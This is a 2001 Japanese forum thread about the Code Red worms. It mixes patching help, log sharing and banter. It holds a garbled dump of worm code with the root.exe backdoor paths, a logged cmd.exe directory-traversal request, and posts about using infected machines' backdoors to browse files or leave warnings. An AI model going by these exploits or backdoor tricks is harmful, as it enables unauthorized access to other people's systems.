CloseHandle �u・UEﾐ・ _lcreat �u・UEﾌ・ _lwrite �u・UEﾈ・ _lclose �
u・UEﾄ・ GetSystemTime �u・UEﾀ・ WS2_32.DLL �UEｼ・ socket �uｼ�
UEｸ・ closesocket �uｼ�UEｴ・ ioctlsocket �uｼ�UE､・ connect �uｼ�
UEｰ・ select �uｼ�UE�・ send �uｼ�UEｬ・ recv �uｼ�UEｨ・ gethostname �uｼ�
UE懆 gethostbyname �uｼ�UE倩 WSAGetLastError �uｼ�UE碑 USER32.DLL �
UE占 ExitWindowsEx �u・UE古畿・ﾀ・@右ы・xV4ﾁﾀﾃ鞦���< t・�t竟���
旗韆���韓ﾁ・鞋���旗靱���韓雍���・・ ���� ��� ��� ��� ��� �� �� ��Y・・ﾘ#
・���ﾘ�・t麾�炙・拗���t津h
劫\���P�U熏ｼ\���・ \CMD.EXE ^・･､ｳcj
・
d:\inetpub\scripts\root.exe ・$・劫\���P�Uﾜj
・ d:\progra~1\common~1\system\MSADC\root.exe
・$・劫\���P�Uﾜ霄 ・ZP    �� ｸ @

補足。
2001年10月1日以降の場合、Code Red II によってマシンがリブート
されるので、絶滅することになる。
新たな新種が登場しなければだが・・・

>>615をUNICODE変換すれば良いのか？

やっぱり今までMS製OSの自粛に反対してきた自分勝手な馬鹿も今回の共犯者だよな。
最低でも企業や政府機関がMS製OS使ってたらそれだけでもう犯罪だよ。
MS製OSが職場にあると、知ったかぶりの初心者が必ず隠れていらんことするからな。

>>615

変換したらこうなった


ｻｻ `ﾅE ﾃﾅEdg?6 dgﾅE ﾋ? h 釉\悃抉拔咲ﾅE悃抉拔ﾅE@ﾅE粡X悃撈UﾅE �ｽ= �･
ﾕ所粡T悃昴uﾅ~0ﾅE ﾅE ｫF0ﾅE ﾅE
CodeRedII ﾅE$拔伺 ｿ?ﾖ8悃抬ﾅE悃? j 釉P悃抉
釉8悃抉絋挾晝ﾑ ﾄ?8悃掖hS拔拳UﾅEEﾅE�T悃?, ﾅE, ﾋｳ 溜ﾘｫ礑4蹙ﾅEj 掎ﾅE ﾅE
撈挧 j 拔姫拔ｭOuｳﾅE i�T悃? \&ﾅE \&W拔ﾋj j拔號撈Uﾋﾎ倥F4)EﾅEd拔ﾋ酣E悃抉拔ｿ?ﾅE悃?=ｳ sｦ?ﾅE悃敘E
s?fｫﾅE撈? fｫﾅE撈? Pﾋd 竡t撈挧 jj拔ｽﾅE掖ﾚ礒ﾄjTh~fﾄ掎ﾄ拔ｧYj釉p撈抉掎ﾄ拔Μ ｿtK3､拔ﾅE3' u?ｫﾅE撈?
ｫﾅE撈? ｫﾅE撈? 絋ﾄ籔d撈晉ﾖh撈抉j 釉`撈抉j j拔ﾝ?j Th~fﾄ掎ﾄ拔ｧYﾅEu1 X-ｲ
j hﾅE P掎ﾄ拔ｨ=ﾅE uj j釉\悃抉掎ﾄ拔ｮ掎ﾄ拔･ﾈﾁ悃擡 購ﾅE ﾅE xuｪ 娩`ﾅE 綸$
dgﾅE XaﾅEdg?6 dgﾅE fﾅEMZu薙K<ﾅE PE uﾗ綉 xｲ紕 ﾅEKERNu嫁|EL32uｪ3蟹縒 ﾛｸAでE
GetPu槐|rocAuﾅEJI暁EJ$? ｡ﾅEJﾅE 遺D$$dgﾅE Xa依Q撈昶]ﾅEEｯﾋ
LoadLibraryA ?
uﾅEUｯ礒ﾙﾋ
CreateThread 掎ﾅEUｯ礒瞥
GetTickCount 掎ﾅEUｯ礒ﾅE Sleep 掎ﾅEUｯ礒ﾋﾋ
GetSystemDefaultLangID 掎ﾅEUｯ礒藩 GetSystemDirectoryA 掎ﾅEUｯ礒
CopyFileA 掎ﾅEUｯ礒ﾐﾅE GlobalFindAtomA 掎ﾅEUｯ礒芝E GlobalAddAtomA 掎ﾅEUｯ礒固E
CloseHandle 掎ﾅEUｯ礒ｭﾅE _lcreat 掎ﾅEUｯ礒ﾃﾅE _lwrite 掎ﾅEUｯ礒ｻﾅE _lclose ?
uﾅEUｯ礒淒E GetSystemTime 掎ﾅEUｯ礒ｿﾅE WS2_32.DLL 拔ﾙ礒ｺﾅE socket 掎ｺ?
Uｯ礒ｽﾅE closesocket 掎ｺ拔ｯ礒･ﾅE ioctlsocket 掎ｺ拔ｯ礒ｧﾅE connect 掎ｺ?
Uｯ礒ηE select 掎ｺ拔ｯ礒ﾝﾅE send 掎ｺ拔ｯ礒ｨﾅE recv 掎ｺ拔ｯ礒ｮﾅE gethostname 掎ｺ?
Uｯ礒才 gethostbyname 掎ｺ拔ｯ礒射 WSAGetLastError 掎ｺ拔ｯ礒�� USER32.DLL ?
Uﾙ礒?ﾋ ExitWindowsEx 掎ﾅEUｯ礒蛻絋ﾅEｿﾅE@礒ﾑ酣ExV4落｡ｿ依ｷ撈?< tﾅE掖ﾛ依ﾌ撈?
莟ﾋﾊ撈昜治ﾅEﾋﾐ撈昜ｯﾋｹ撈昜射･撈敘E ﾅE 撈撈 撈? 撈? 撈? 撈? 撈 撈 撈YﾅEﾅE似ｭ#
ﾅE悃? 柴ﾅEtｽﾄ夾tﾅE珊悃掖�､h 釉\悃抉拔ｺ\悃敘E \CMD.EXE ^ﾅE�ｧ?cjﾅE
d:\inetpub\scripts\root.exe ﾅE$ﾅE釉\悃抉拔ﾐjﾅE d:\progra~1\common~1\system\MSADC\root.exe
ﾅE$ﾅE釉\悃抉拔ﾐﾋ? ﾅEZP 撈 ｽ @

Ｍ＄の提灯持ちＰＣ雑誌は今回の事なんて書くかな。
まさかＣｏｄｅＲｅｄは初心者には無関係の事件でした、とか書くなよ。
現実に迷惑なＭ＄の事実を何にも書かないＰＣ雑誌も同罪なんだよ。
どうせまたＣｏｄｅＲｅｄは無視してＸＰＸＰ初心者もＸＰ！、とかなんだろうな。

>>615
本来はログに残らないワーム本体だね。GETが無いやつと同じ
ようなものかも。

>>620
雑誌は小手先のテクニックを伝えるのが精一杯。
雑誌がどう書こうがユーザーの意識が変わらなきゃダメなわけ。

>>620
Code Red に関することには一切触れなかったりして・・・

>> 620

ＮＨＫニュースの報道とかさ、ＣＮＮとかさ、

「一般のユーザには関係ありません」とか
「ダイアルアップで接続している方には影響ありません」

なんて言ってたじゃん。

これって正しくないよね、特に日本では。

無知な Windows ユーザが IIS を使ったりさ、アプリ
ケーションの都合で本人が意識しないで使ってたりさ、
一般のダイアルアップユーザが被害広げてるんだもんな。

日本のパソコン雑誌では取り上げないんじゃないかな。

そもそも、MS製OSがどうしてセキュリティに弱いのかって
事は、パソコン雑誌ライターのほとんどには分からないと
思うよ。せいぜい「よく使われているからセキュリティの
問題が発見されやすい」って思う程度で、構造的な問題、
設計上の問題は理解できないだろう。

いま原稿料安いから、ライターには、技術的に優秀な人っ
て少なくなっちゃってるし、今までの実績から、
あまり雑誌には期待しない事にしてるけど、

たとえば、MS製OSの問題点を明確的確に指摘して、
セキュリティを向上させる方法、用途によっては他のOSを
使用する提案なんかを書いた特集でも組めば見直すけどね。

広告費の20%をM$に依存している以上、PC雑誌にM$批判は載らないだろ
パッチを当てない奴が悪いって記事になるに10000ペリカ

>>624
>ＮＨＫニュースの報道とかさ、ＣＮＮとかさ、

>「一般のユーザには関係ありません」とか
>「ダイアルアップで接続している方には影響ありません」

>なんて言ってたじゃん。
この辺詳しく説明しておいたＹＯ

これって正しくないよね、特に日本では。

> ＮＨＫニュースの報道とかさ、ＣＮＮとかさ、
> 「一般のユーザには関係ありません」とか
> 「ダイアルアップで接続している方には影響ありません」

それって、誰が言ってたの？アナウンサー？

root.exe 使って \Program Files 覗いたら
2chブラウザ っていうディレクトリが出てきた (藁

こんなん来た。
203.69.225.146 - - [13/Aug/2001:06:22:29 +0900] "GET /scripts/..%255c..%255cwinn
t/system32/cmd.exe HTTP/1.0" 404 304

自動サーチかなあ。

今回もそうだがチャイニーズvsヤンキーの泥仕合は世界中の無関係な人間に迷惑かけすぎ。
なにが停戦だよ。ガキの戦争ゴッコに社会人を巻き込むな。
隣接IPはこっちにも相手にもすげー迷惑。

管理者の方々おつかれさまです。

赤丸でかくなっているじゃん。
北海道のとさかも隠れちゃった。

混乱ついでに、ワームがあけたバックドアからＮＡＰサーバーを
どんどん送り込む新ワームなんか出てくると楽しいかも。

攻撃しっぱなしより、サーバーのほうがましだよね＞被害者？？

>>624
ある種のルータには buffer overflow の副作用が出て、SINET
とか WIDE も部分的に止まってたし。被害がないってのは、目
に見えるようなかたちでないってだけで、ないわけはないのよ。
うん。

>>607, >>629
感染してるマシンの IP address 公開すんのはやめようよ。それって裏口の
あるマシンを公開してるのと同じことなんだし。悪用できるサーバを公表し
てたって、火を消すんじゃなくて油注いでるようなもんだよね。

感染してるマシンに root.exe 使って知らせる良い方法はありませんか？
もう、ウンザリです。

>>634
公表してるのはcode redを送出してる方と思われ。
ログとか公開してる↓こんな所に大量にあるよ。
http://www.alec.ac.jp/~akimichi/codered_sites.txt

>>635
メール(藁

公開しなくても自動的にどんどん新しいのが来るんだよね（;´Д｀)
>634

>>637
それができりゃ苦労はない (藁
相手のメールアドレスが分からないので困っています。のだ。

やっぱcode redの仕様が最後にｎａｐ鯖とかｍｘ鯖になって終了
ということになってれば良かったんじゃないかと・・・

>>635
過去ログを読みましょう
ﾃﾞｽｸﾄｯﾌﾟに警告文名のﾌｫﾙﾀﾞ作ったら即効で接続きられたよ（ｗ

>>641
ありがとうございます。やはりそれしか無いですかねぇ・・
ちょっと躊躇していたのですが、試してみます。

解決にはならんと思うけど、少なくとも日本にある感染IISについては
3回の警告の後、強制代執行によりformatってのはどんなもんでしょう。

>>643
formatはできないんだってばよ。

「うちは、Index Service止めてるから大丈夫」
という話をよく聞く。大丈夫じゃないよ・・・

でもさ、「うちは、Linux/BSDだから大丈夫」とか言ってるやつも同じ意識レベルだよ。

んじゃregedit？
>>644

>>「うちは、Index Service止めてるから大丈夫」
>>という話をよく聞く。大丈夫じゃないよ・・・

うっ。そうなの？
最初は、一時回避策としてそうするつもりだった。
やばかった。
結局、IISはすべて止めちゃったけど。

NIFTYのページの

>7月31日に出現した「CODE RED」はWebページの改竄を行うワームです。
>Windows NT 4.0 または Windows 2000 システムにおいて
>IIS が動作しているコンピュータ の場合は、対応が必要になる場合もございます。

これってなんか違うんでないかい？
出現は20日かそれ以前だし、Win9x系も対象なんじゃなかったっけ？

Apacheで送ってきた相手のlocalhostにリダイレクトさせて、ついでに
ディスクトップにフォルダを作るようにできるんじゃないかな？
試してないけど。

plalaとhi-ho、最悪・・・

何か奇怪な現象が・・・
08/13/01 13:29:43 OK 61.142.51.* 80
08/13/01 13:29:45 OK 61.142.51.* 80
08/13/01 13:29:50 OK 61.142.51.* 80
08/13/01 13:32:23 OK 61.183.34.* 80
08/13/01 13:32:25 OK 61.183.34.* 80
08/13/01 13:32:26 OK 61.183.34.* 80
08/13/01 13:42:32 OK 61.156.20.* 80
08/13/01 13:42:33 OK 61.156.20.* 80
08/13/01 13:42:34 OK 61.156.20.* 80
08/13/01 13:48:52 OK 61.150.181.* 80
08/13/01 13:48:55 OK 61.150.181.* 80
08/13/01 13:49:02 OK 61.150.181.* 80
08/13/01 14:00:23 OK 61.116.13.* 80
08/13/01 14:00:25 OK 61.116.13.* 80
08/13/01 14:00:30 OK 61.116.13.* 80
同じIPアドレスに３回アタックするようにワームコードが改造されたか？

>>651
普通だよ。

>> 606

どこですか？
なんかパッチあてても駄目みたいなんですよー
しばらくするとまたメモリ内に、、ちょっとした悪夢てす。

>>606

こうか。

>>652
普通なのか・・・
今日の一時頃から急にこうなったもので。

M$はイってる。

M$Nいっとるね。
Pingもかえらん。

D:\>tracert 207.46.176.152

Tracing route to msn.com [207.46.176.152]
over a maximum of 30 hops:

1 <10 ms 10 ms <10 ms air [******************]
中略
10 181 ms 180 ms 170 ms iuscmdistc1206-p-7-0.msft.net [207.46.190.117]
11 160 ms 170 ms 161 ms iuscsecurc1204-ge-6-0.msft.net [207.46.129.178]

12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
後略

ご冥福をお祈りします （ﾌﾟｯ

>>656-658

共にWebは見れるよ。
pingは返ってこなかったが、
そういう設定なんじゃない？もとから

>>659
漏れんとこからも駄目。
リロードしても表示される？

靖国神社
http://www.yasukuni.or.jp/

>>659
今治った。

http://www.microsoft.com/japan/technet/security/codealrt.asp
このサイト公開日が７月３１日になっているが、
内容はえらく更新されて無いかぁ？

>>663
一番下に↓って書いてるよ。
終更新日：2001 年 8 月 11 日

>>664
そーゆうところが、MSらしくて（ハート）、見逃していました。

マスコミは公共の安全のためMSの不良品に注意するよう、
広く伝える義務があるのに、まったく存在価値無し。

だって、MSってスポンサーなんだもん。

>>661
おお重い・・・
半分以上はＫ国じゃないの？

M$は存在自体悪です。

>>668
おまえもその一人だよ。
クリックするな。

そろそろ赤虫限定電波系ホームページが出て来てもいい頃なんだが、
なかなか見つからん。

コードレッドをサーバから完全に駆除する方法ってありますか？
例のセキュリティパッチをあてて、再起動してもしばらくするとまた動き始めます。
パッチをあてて、再起動するだけじゃ駄目なのでしょうか？

>>672
ＯＳは？

Windows 2000 Server と、 Windows 2000 Advanced Server　です。
もちろん、SP2は適用済みです。
セキュリティパッチをあてて安心していたのですが、
全然駄目でした。時折返事しなくなります。
ほっとくか、再起動で直りますが。。

>>674
およよ、本当にそのサーバが感染しているのか確かめた方が
良いです。（新種かなぁ…）
どうしても再感染するようなら、スクリプトマッピングを全部
外してみてください。

>>673
「しばらくすると動き出す」んじゃなくて、
再感染してんじゃねの？

存在の有無はトレンドマイクロの自動駆除ツールを使用して
確認しました。パッチをあて、再起動後しばらくは居ないのですが、
数分後にもう一度ツールを走らせると、出てきます。
ida,idqのスクリプトマッピングは削除済みです。
ログをみても特に亜種の形跡はないです。
いわゆる、「default.ida XXXXX〜」が数回残ってる位です。

>>677
MSのセキュリティパッチ（SP２に更に当てる奴）当てた？
駆除ツールは駆除してくれるだけだよ。
でも、マッピング削除して感染するのがよー分からん。
パケット観察してみるがよろし。

てか、アドバンスサーバ持っているって事は大きなところ
なんだろうから、サポート呼び出しが一番かも。

ネットワークカードを２枚挿して、
パブリックとプライベートを分けて管理していて、
始めはそれが問題なのかと思い、
内側のネットワークから切り離しても駄目でした。

ネットワークから切断
↓
パッチをあてる＆駆除ツール
↓
再起動
↓
駆除ツールで居ないのを確認
↓
外側のネットワークのみ接続
↓
数分後に感染

って感じです。

>>677 さん

もちろんセキュリティパッチはあててあります。
存在の有無の確認に駆除ツールを使用しています。
でかくはないです、中小です。
で、わたくし、じつはサポートだったりします。（恥

>>679
トレンドの駆除ツールの動作がよーわからんので、
詳しい人お願いします。

単純に攻撃を受けてるだけだったりしないのかなぁ…

root.exeの有無はどうなんでしょう？

あとスクリプトマッピング全部はずしてみるとか。
これで感染しないとなると、新種だな。

>>678 さんでした。訂正します。

はあ、お腹空きました。

>>681 さん

　攻撃を受けるだけで、沈黙しちゃうんでしょうか？
　沈黙中はピンも通りません。外側のネットワークのみ使用不能です。
　なので、再起動やら、サービスの再起動くらいは可能なんです。
　ほっとくと復帰しますが、おそらくその時間、
　皆様にご迷惑をお掛けっぱなし、かと思われます。すみません。

いままでのcode red/IIの動作と違く見えるねえ。
なにか勘違いが入っているのではないかと思うんだけど。

>>684
物凄い量パケット飛び交っているからねぇ…回線の状況とかによっては
ありえるし、でも詳しいことあんまりここに書けないと思うから、
パケットモニターを見るのが一番。
内部で山のように感染していて、それが原因だったりまぁ色々あるし。

>>682 さん

把握している限りではバックドアの生成は今まで無いです。
そのあたりの状況は目視、および駆除ツールのログで確認済みです。

>>683 さん

使用しているスクリプト以外は外せますが、実際稼動しているので
難しいかと思われます。

こういうふうにお話を聞いていると、
皆さんの場合はパッチが効いてそれ以降は問題ないようですね。
セキュリティパッチをあてて、再起動するとコードレッドの脅威は基本的には去る、
との認識で間違っては居ないですよね？？

>>687
＞セキュリティパッチをあてて、再起動するとコードレッドの脅威は基本的には去る、
そのホストに関してはね。

＞把握している限りではバックドアの生成は今まで無いです。
もう動作が全然ちがうので、逆にワクワクしてます（ごめんね）

貴社の先輩とかで、詳しい人に連絡とってみるがよろしぃ。
こういっては失礼かも知れませんが、６８０さんの力量を超えていると
思うなり。

パッチを当てても既にバックドアが作られている場合、バックドアが
残ってしまうというのは過去ログとか、>>1-2の資料にあるから
知っているよね？

駆除ツールのログで感染を確認というのがなんか、怪しいような
その辺が変なんじゃないかと思える。

>>689
同感。駆除ツールの使い方（ログの読み方）が不味いのかも？＞６８０

使ってるのがこれ
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
ならバックドアの始末はしてくれるみたいだねえ。

たとえばの話ですが、
Ａサーバ、ＢサーバとＩＩＳが動作しているサーバが２台あって、
そのうちの１台Ａサーバはインターネットへ繋がっているとします。
で、そのＡサーバは２枚のNICによりプライベートなアドレスも持っていて、
内側でもう一台のＢサーバとドメインを形成しているとします。
Ａサーバに対策をしていない場合、Ａサーバはワームに感染しますが、
その後、裏側で繋がっているプライベートなＢサーバへの感染は
ありえることなのでしょうか？この場合はなんかありえそうですね。

で、その双方にセキュリティパッチをあて、再起動すると、
パッチをあててることにより、ワームは居なくなりそうな気がします。
でもパッチ自体がポート80からの侵入のみ防ぐもので、
別のポートからの侵入（ドメイン内なのでなんでもありです。）が可能なら、
そうもいかないですね。。

内側から切り離したサーバでも駄目だったらそれだけではないでしょうけれど。。

CodeRedもウザイが
盆踊りもかなりウザイと思う田舎モンのおれ。

もしかして誤検知じゃないかな。

＞ありえることなのでしょうか？
無茶苦茶ありえます。てか、そんな環境で大丈夫なの？
とユーザでも社内でもない人間に説教たれたくなります。

＞ドメイン内なのでなんでもありです。）
ちょっと勘違いとかも有るようなので、このスレと過去スレ全部読んでみる
がよろしぃ。

ちなみにどこの会社？なんてこと言いたくなってきました（藁

>>688　さん

頼れそうな人が長い夏休みで音信普通です。寒いです。

>>689 >>690　さん

居る場合と居ない場合の違いと、簡単な英語でのログなので、
多分問題無いかと思われます。

>>691　さん

そうです。それです。

誰かこいつになんか言ってやれよ

http://messages.yahoo.co.jp/bbs?action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1763
http://messages.yahoo.co.jp/bbs?.mm=TR&action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1764
http://messages.yahoo.co.jp/bbs?.mm=TR&action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1765

ケーブル外した状態で、リブートしなおして、再び駆除ソフトで
確認して、駆除ソフトが、「虫がいる、いるよぉ、」って言ったら
誤検知と思われ。別の会社の検知ソフトも使ってみるべきかも。

あと、駆除ツールも本当に最新版かもう一度確認してみそ。

>>695 さん

ごめんなさい〜（'_`）
、上司にぶっとばされそうなので会社名は言えません。

えー、、ということは、、
パッチをあてても、全然抑止力になってないってことですか。

あれ？でも、内側のネットワークから隔離した（物理的にも）
サーバにも感染してました。

ネットワークから切断（パブリック、プライベート双方）
↓
パッチをあてる＆駆除ツール
↓
再起動
↓
駆除ツールで居ないのを確認
↓
外側のネットワークのみ接続
↓
数分後に感染

これはありえませんか？？

>>696
その頼れそうな人って、イッチーですか？
いや、昔俺がいた会社みたいだぁ（藁

>>700
一応手順が本当にしっかりしていれば、そのホストに関しては
無いはずです。ですが、内部ネットワークはもうボロボロになっている
と思われるので、そっちの心配もして欲しいです。

最近海外から来るの、APNICで調べるとどれもKORNETとCHINANETなんだけど、
ひょっとしてあれらの国ってこの２つしか無いの？

>>697　さりげなく見てみたんですけど、、、

ネタですよね？　がいしゅつ？

>>702
APNICでは国単位でしか管理してなくて、
各国の個別データベースに行かないと分からなかったような気がします。

>>701　さん

残念ながらイッチーさんという方ではないです。
バカンスから帰ってきたら何か言ってやりたいのですが、
怖いひとなので止しておきます。

了解いたしました。
もうちょっと落ち着いて状況を把握してみようと思います。

おそらく、内側から隔離したサーバへの感染が偶然として、
内側で繁殖してるのでパッチをあてたサーバにも感染してるということにします。
とりあえず、今日は寝れなさそうなので、またあとで遊びに来ます。
まずは、ラメーンか何かで腹ごしらえをしてきます。

おひおひ帰ってしまうのか。
大丈夫なのか、せめて外部につながる回線は切ってから
帰って欲しいぞ。

どれぐらいの規模なのかしらないけど、
感染してる疑いがあるなら、ネットから完全に切り離してくれ。
業務に支障がでようが関係ないから切り離せ。
「感染しちゃった、あはは」じゃ済まないんだから。

アドバンスドサーバ持って（導入させといて）、このレベルのサポートって…

A:ｶﾞｺｶﾞｺで気づいてくれないので、
routeで切断して差し上げました。

ｲﾝﾀﾈｯﾄに繋がらなければ気づいてくれるでしょう。

680は、ウィルスとワームの区別が付いていないと思われ。

いまさらだけど、
>>653-654
このへん >>161
今分かっている状況としてはパッチを当ててもだめなのはIIS4
なんだよな。
ちょっと上の奴もふくめて、
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
のメモリ内のcode redIIチェックが馬鹿でログの中にcode redIIの
Getアクセスがあったりすると、いるいる、いるよ〜、と反応している
んじゃないかと思ったりする。

とりあえず、ひたすら netstat -anしてみて
よそ様の80ポートをアクセスしていないかを
確認してみるのも安心する手になる....かな。

そろそろ出るかもしれんのでツクタヨ
http://www.nefty.net/desktop/haritsuke/img-box/img20010813221142.gif

>>713
楽しいヤツだな。

>>711
うーんとこれはNT４．０の場合じゃないの？
確かにどっちとも取れると思うけど。
W2kの一番初めはIIS4だっけ？

Win2000proでIndexingserviceは停止しています。
シマンテックのツールで感染していないことを確認しSp2にパッチを当てパーソナルFirewallを動かしているのですが、
ここを読んでいるとIndex Service止めるだけじゃ駄目とあります。
少なくともCodeRed2に関してはこれで大丈夫ではないでしょうか？
日に数百アタック受けていますが今のところ問題ありません。

＞Sp2にパッチを当て
これをちゃんとやってるなら、INDEXサービす動かしてもいいよ。

>>709
routeｲｲﾈｯ

>>717
得体の知れないSP2やパッチなんか入れられない。って人が緊急避難的にインデックスサービス止めてネットに繋ぐのは危険ですか？

>>715
　だから、IIS4以外でパッチを当てているのに再び感染する
　という状況は、今現在知られている範囲ではありえない。
　と、言いたかったんだけど。

>>719
その場合はスクリプトマッピングを外さないと駄目。
てか、この期に及んでそんなこと言うな、諦めてSP2とパッチ当てろ。
得体の知れないOSなんだから（藁

>>720
了解です。自分もちょっとどっちかなぁって悩んでいたもので。
680君の登場もあったし…

インデックスサービスを止めるってのは何の意味もないの。
IISに対して.idqや.idaという拡張子を持った要求をされた場合に
idq.dllを呼ぶようにアプリケーションマッピングされているのが
問題になるので、やるならアプリケーションマッピングの解除なの。
って>>1のリンク先に書いてあるのに。

>>>721
横レスですみませんがスクリプトマッピングのはずし方を教えてください。
このような質問がうざいのは百も承知ですが、事が緊急を要しますので初心者板行けとか過去ログ読めとかなるべく言わないでほしいのですが。

>>2か>>3の
MSへのリンク読め。ダイアログのコピペ付きで解説してある。
ここで文字で聞くよりいいぞ。

>>724
4. 見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
　　すぐに↓をチェック！
　http://www.microsoft.com/japan/technet/security/codeptch.asp


あんたにとって緊急でも、それに対してサービスする義務の
ある人はここにはいない。

>>725
ご丁寧にありがとうございます

>>724
過去ログ読め(藁

＞事が緊急を要しますので
ずいぶんゆっくりした緊急事態。今日は8月13日。南無ぅ〜♪

>>1の一番最初にあるリンク先も読まずに、やりかたを説明しろ
とかいう人間はどんな育ちかたをしたのかちょっと興味があるなあ。

>>730
繰り返すようだけど、昔いた会社がオーバラップする。
世の中こんなものなのかなぁ…

不謹慎でスマンが亜種の場合
http://www.nefty.net/desktop/haritsuke/img-box/img20010813224631.gif

元気になったありがとう

>>732
これまた、ｲｲ画像持ってるネ！

http://www.kishou.go.jp/

>>732
五十嵐先生 ﾊｧﾊｧ･･･

>>731
そんなものだ。
そうなるようにM＄が仕向けたんだけどな。GUIで簡単設定とかいって。
本質もわからずに設定できるわけないじゃん。

>>732
その亜種なら幾らでも来てほしいぞ。

俺はこっちの方がいいな。
http://www.nefty.net/desktop/haritsuke/img-box/img20010813225315.jpg

これはなんなの？
http://www.nefty.net/desktop/haritsuke/img-box/img20010813222700.jpg

みんな疲れてきてるみたいね・・・・
赤虫の作者は反省しる！

>>734
全セットでね　　ﾆﾔﾘ

「反省しる」ってなんだ？
krからのアタックか？

>>743
ここ見た？>>740

>>1のリンク先読みましたが、そこの説明にある管理ツールの中にインターネットサービスという項目がありません。
これはインデックスサービスをインストールしないと出てこない項目なんですあか？

Yahoo!BBにもっと細かい情報開示を要求しる！
http://salami.2ch.net/test/read.cgi?bbs=isp&key=995733300

たまにいい画像あるからさらす。
http://www.nefty.net/desktop/haritsuke/imgboard.cgi

>>745
　IISをインストールしないと出ないこうもくなんでよす。

誰か書く前に書いておこ〜っと。
反省汁

>>745
君は誰だ？

ヌード写真一枚で動揺してはいかん。
スレの雰囲気がかわってしまっているぞ。

>>751
反省してます！

ブラ、クラッ
http://www.tokyotopless.co.jp/GilgameshClub/ticket.html
http://www.rakuten.co.jp/pon/287564/
http://japan.admcity.com/fashion/plus-bra/index.shtml
http://homepage1.nifty.com/sumisumi/bra/
http://www3.ocn.ne.jp/~mimoza/
http://www.h2.dion.ne.jp/~panchu/newpage1.htm
http://members.tripod.co.jp/moccosbb/
http://www.nifty.ne.jp/forum/ffortune/calen/kinenbi/02/brassiere.htm
http://www2.odn.ne.jp/~cdn54070/baka7.htm
http://www.wacoal.co.jp/products/wing/inner_inf/br_q.html
http://www10.u-page.so-net.ne.jp/kg7/satitww/buraja.htm

反省汁しらないのか？本当に反省したときだけ、さきっぽから出るんだぞ。

>>753
　いっぱい見つけてきたのは偉いと思うが、それはブラクラの
　スレじゃないと面白くないってばよお。

>>747
ノリカのイイ。

>>755
ブラ＝ブラジャー

>>757
　わかってるよ、下のどこかのブラクラのスレでみたよ。

>>744
見ていたよ。ちょっと時間差(local proxyのTTLが５分ごとだから）で
変なレスになっちゃった。

>>754
もしかして、新しい2ch用語誕生か？

みな、しっかりしろ、ここはおかずスレじゃないんだ。

コードレットたん、ﾊｧﾊｧ

>>760　ｽﾏｿ
来るだけで　いい加減　飽きました。
何かCodeﾁｬﾝと遊びたいんですが。
6日〜12日のApacheのLogは3.7MB越えとります。どうするのやら。

反省汁ださしたろか！
　　　　　　ﾌﾞﾆｭﾌﾞﾆｭ

今度反省汁で作ってイイ？

code redがくると鳴る風鈴でも作れば、涼しくなるし
楽しめるよ。

code redが来るとメールを送るスクリプトを組んでみた。
とりあえず自分宛てに送信。数分後。40通のメールが届きました(藁
なんて恐ろしい。

>>763
顔にかかっているヤツきぼーん。

次回のスレタイトルでも使うか？
反省汁。

code red 反省汁、顔にかけてー
って、なんじゃそりゃ。

code red 反省汁、中田氏するな

コードレッド（CodeRed）いいかげん反省汁！

なぜ、写真一枚でここまで動揺してしまうんだ（笑）
上の方のパッチをあてても感染してしまうというのが気になったが
本人はラーメン食いにいったまんま帰って来ないね。

まだまだ逝きてます！コードレッド(Code Red)

code red 鎮まれ！　Yahoo! BBスレは沈まれ！

ねえん、新種はまだなのぉ？コードレッド(Code Red)

滅亡予定日まで一ヶ月半・・・コードレッド(Code Red)

新種出していい？

では上記の経過から反省汁は2ch用語として登録されました。
語源はバカの一言”反省しる”から来てますので 読みは　”はんせいしる”で
行きたいですが、”ジル”でも可とします。
広く、汁物の呼称でも構いませんが、反省させる、する、の誤用系でも
オーケという意見も採り入れ、ケースバイケースで応用するということです。

>>776
お茶目でキュートで、五十嵐先生みたいな奴にしてね。

新種出す前に、
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
の動作を確認してみて欲しいな。

誰か呑気なこいつになんか言ってやれよ

http://messages.yahoo.co.jp/bbs?action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1763
http://messages.yahoo.co.jp/bbs?.mm=TR&action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1764
http://messages.yahoo.co.jp/bbs?.mm=TR&action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1765

あれ？そういえば、しみじみ君は？

>>780
連休でもういません。
http://messages.yahoo.co.jp/bbs?.mm=TR&action=m&board=1834684&tid=kl6ka4na4ha4a6a4k4a8a4a4bfma19a1d&sid=1834684&mid=1766

反省汁よ

もう寝る
http://www.nefty.net/desktop/haritsuke/img-box/img20010814002627.gif

しみじみ騙っていいですか？

>>779
カクニンシタヨ
オヤスミ

code red , MSの後門(back GATES)をアタック

最初は面白がって「どんどんログがたまるぜ」とかいってたんだけどさ、
おんなじホストから毎日攻撃を受けると段々腹が立ってくるわけよ．
そろそろ連絡してやった方がいいのかなあ

某ADSL系ISPからの返事

>お問い合わせの件ですが、
>該当のユーザーには注意を行いました。
>
>今後も宜しくお願いいたします。

今頃、co.jpから来た・・・
なんとまぁ

interQから、今日、大量に来ました。
どうなってるんですか？

全国各地からmeshがしぶとくやってきます。

>>789
InterQはなんの返事も無いよ。

>>793
CCに[email protected] を入れて、返事を求めてみては？

>>778
「イオナ」？＞五十嵐先生

７割　韓国
２割　日本
１割　その他（中国）

つー感じかな。
パッチの宛て方もわからんのかね・・・・。

Code Red III. This time its not a joke,
A third version of the Code Red worm exits on the internet
as was reported by companies in Korea
The worm mainly spreads there (Korea etc.) and not out of
it till now it infected already 43,000 IIS servers.


ネタかなー。ソース違うのかなー。

>>797
過去スレで、コードレッド２の誤認識（別名）という結論になっていたが、
何時のソース？

　なんだかんだ言って今のワームって地味だよな。
「ワルキューレの騎行」かなんか鳴らしながらwin2k
uninstallしてさ、代わりにOS/2あたりを入れていく
